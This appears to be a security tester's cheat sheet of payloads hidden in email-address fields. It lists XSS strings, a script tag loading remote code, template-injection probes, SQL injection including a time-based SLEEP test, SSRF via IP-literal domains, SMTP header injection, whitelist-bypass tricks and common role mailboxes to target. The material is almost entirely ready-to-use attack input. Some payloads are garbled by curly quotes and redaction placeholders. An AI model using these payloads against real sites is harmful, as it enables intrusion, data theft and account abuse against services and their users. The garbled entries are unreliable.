| Attack | Payload |
|---|
| XSS | test+(alert(0))@example.com test@example(alert(0)).com “alert(0)”@example.com <script src=//xsshere?”@email.com |
| Template injection | “<%= 7 * 7 %>”@example.com test+(${{7*7}})@example.com |
| SQLi | “‘ OR 1=1 — ‘”@example.com “mail’); SELECT version();–“@example.com a’-IF(LENGTH(database())=9,SLEEP(7),0)or’1’=’1\”@a.com |
| SSRF | [email protected] john.doe@[127.0.0.1] |
| Parameter Pollution | victim&[email protected] |
| (Email) Header Injection | “%0d%0aContent-Length:%200%0d%0a%0d%0a”@example.com “[email protected]>\r\nRCPT TO:<victim+”@test.com |
| Wildcard abuse | %@example.com |
# Bypass whitelist
inti(;[email protected];)@whitelisted.com
[email protected](@whitelisted.com)
inti+(@whitelisted.com;)@inti.io
#HTML Injection in Gmail
inti.de.ceukelaire+(<b>bold<u>underline<s>strike<br/>newline<strong>strong<sup>sup<sub>sub)@gmail.com
# Bypass strict validators
# Login with SSO & integrations
GitHub & Salesforce allow xss in email, create account and abuse with login integration
# Common email accounts
support@
jira@
print@
feedback@
asana@
slack@
hello@
bug(s)@
upload@
service@
it@
test@
help@
tickets@
tweet@
